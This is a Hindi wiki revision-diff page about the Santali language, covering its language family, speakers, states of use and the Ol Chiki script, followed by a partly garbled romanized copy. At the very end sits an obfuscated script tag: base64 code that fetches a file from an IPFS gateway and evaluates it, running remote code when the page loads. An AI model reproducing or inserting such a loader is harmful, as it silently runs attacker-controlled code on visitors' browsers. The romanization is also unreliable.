Difference between revisions of "संथाली भाषा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*संथाली एक भाषा है। *यह संथाली 'ऑस्ट्रो-ऑस्टिक' परिवा...' के साथ नया पन्ना बनाया)
 
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*संथाली एक भाषा है।  
+
संथाली एक भाषा है। यह संथाली 'ऑस्ट्रो-ऑस्टिक' परिवार की एक शाखा से जुड़ी भाषा है।  
*यह संथाली 'ऑस्ट्रो-ऑस्टिक' परिवार की एक शाखा से जुड़ी भाषा है।  
 
 
*जो 'हो' और 'मन्दारी' से संबंधित है।  
 
*जो 'हो' और 'मन्दारी' से संबंधित है।  
 
*संथाली भाषा को लगभग 60 लाख लोग [[भारत]], [[बांग्लादेश]], [[नेपाल]] और [[भूटान]] में बोलते हैं।  
 
*संथाली भाषा को लगभग 60 लाख लोग [[भारत]], [[बांग्लादेश]], [[नेपाल]] और [[भूटान]] में बोलते हैं।  
*भारत में ज्यादातर संथाली भाषा का प्रयोग [[झारखण्ड]], [[असम]], [[बिहार]], [[उड़ीसा]], [[त्रिपुरा]], और [[पश्चिम बंगाल]] के राज्यों में होता है।  
+
*भारत में ज़्यादातर संथाली भाषा का प्रयोग [[झारखण्ड]], [[असम]], [[बिहार]], [[उड़ीसा]], [[त्रिपुरा]], और [[पश्चिम बंगाल]] के राज्यों में होता है।  
 
*इसकी अपनी "ओल चिकी" वर्णमाला है।  
 
*इसकी अपनी "ओल चिकी" वर्णमाला है।  
 
*साक्षरता प्रतिशत बहुत कम है जो 10 से 30 प्रतिशत है।  
 
*साक्षरता प्रतिशत बहुत कम है जो 10 से 30 प्रतिशत है।  
Line 9: Line 8:
  
  
{{लेख प्रगति
+
 
|आधार=आधार1
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|प्रारम्भिक=
+
==संबंधित लेख==
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
==संबंधित लिंक==
 
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:नया पन्ना]][[Category:भाषा और लिपि]][[Category:साहित्य कोश]]
+
[[Category:भाषा और लिपि]][[Category:साहित्य कोश]][[Category:भाषा कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 09:41, 3 April 2014

santhali ek bhasha hai. yah santhali 'aaustro-aaustik' parivar ki ek shakha se ju di bhasha hai.

  • jo 'ho' aur 'mandari' se sanbandhit hai.
  • santhali bhasha ko lagabhag 60 lakh log bharat, baangladesh, nepal aur bhootan mean bolate haian.
  • bharat mean zyadatar santhali bhasha ka prayog jharakhand, asam, bihar, u disa, tripura, aur pashchim bangal ke rajyoan mean hota hai.
  • isaki apani "ol chiki" varnamala hai.
  • saksharata pratishat bahut kam hai jo 10 se 30 pratishat hai.
  • santhal jati ke dvara santhali bhasha boli jati hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>